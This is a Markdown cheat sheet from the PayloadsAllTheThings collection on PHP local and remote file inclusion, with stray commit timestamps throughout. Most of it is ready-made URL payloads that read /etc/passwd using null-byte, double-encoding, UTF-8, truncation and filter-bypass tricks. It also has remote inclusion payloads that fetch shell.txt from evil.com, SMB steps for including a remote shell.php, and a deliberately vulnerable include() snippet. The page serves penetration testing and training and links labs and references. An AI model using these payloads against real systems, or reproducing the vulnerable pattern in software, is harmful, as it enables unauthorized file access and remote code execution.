PayloadsAllTheThings/File Inclusion/README.md

157 lines
6.4 KiB
Markdown
Raw Normal View History

# File Inclusion
2018-08-12 21:30:22 +00:00
2023-10-02 10:52:10 +00:00
> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
2016-10-20 02:39:06 +00:00
## Summary
2018-08-12 21:30:22 +00:00
- [Tools](#tools)
- [Local File Inclusion](#local-file-inclusion)
2024-11-29 10:52:51 +00:00
- [Null Byte](#null-byte)
- [Double Encoding](#double-encoding)
- [UTF-8 Encoding](#utf-8-encoding)
- [Path Truncation](#path-truncation)
- [Filter Bypass](#filter-bypass)
- [Remote File Inclusion](#remote-file-inclusion)
2024-11-29 10:52:51 +00:00
- [Null Byte](#null-byte-1)
- [Double Encoding](#double-encoding-1)
2022-08-09 09:02:21 +00:00
- [Bypass allow_url_include](#bypass-allow_url_include)
- [Labs](#labs)
- [References](#references)
## Tools
* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.
* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool
2023-10-02 10:52:10 +00:00
## Local File Inclusion
2024-11-29 10:52:51 +00:00
**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
2023-10-02 10:52:10 +00:00
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
```php
<?php
$file = $_GET['page'];
include($file);
?>
```
2018-08-12 21:30:22 +00:00
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
2018-08-12 21:30:22 +00:00
```powershell
http://example.com/index.php?page=../../../etc/passwd
```
2018-08-12 21:30:22 +00:00
2024-11-29 10:52:51 +00:00
### Null Byte
:warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`).
2019-06-23 22:21:39 +00:00
2018-08-12 21:30:22 +00:00
```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```
2024-11-29 10:52:51 +00:00
**Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470
```ps1
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
```
### Double Encoding
2018-08-12 21:30:22 +00:00
```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
2024-11-29 10:52:51 +00:00
### UTF-8 Encoding
2019-06-29 09:20:17 +00:00
```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```
2024-11-29 10:52:51 +00:00
### Path Truncation
2023-10-02 10:52:10 +00:00
On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
2018-08-12 21:30:22 +00:00
```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```
2024-11-29 10:52:51 +00:00
### Filter Bypass
2018-08-12 21:30:22 +00:00
```powershell
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
2017-08-15 00:37:09 +00:00
```
2023-10-02 10:52:10 +00:00
## Remote File Inclusion
> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
2024-11-29 10:52:51 +00:00
Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5.
2023-10-02 10:52:10 +00:00
```ini
allow_url_include = On
```
2018-08-12 21:30:22 +00:00
Most of the filter bypasses from LFI section can be reused for RFI.
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http://evil.com/shell.txt
```
2024-11-29 10:52:51 +00:00
### Null Byte
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http://evil.com/shell.txt%00
```
2023-10-02 10:52:10 +00:00
2024-11-29 10:52:51 +00:00
### Double Encoding
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
2023-10-02 10:52:10 +00:00
### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
1. Create a share open to everyone
2. Write a PHP code inside a file : `shell.php`
3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
## Labs
* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
* [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
2024-11-29 10:52:51 +00:00
* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)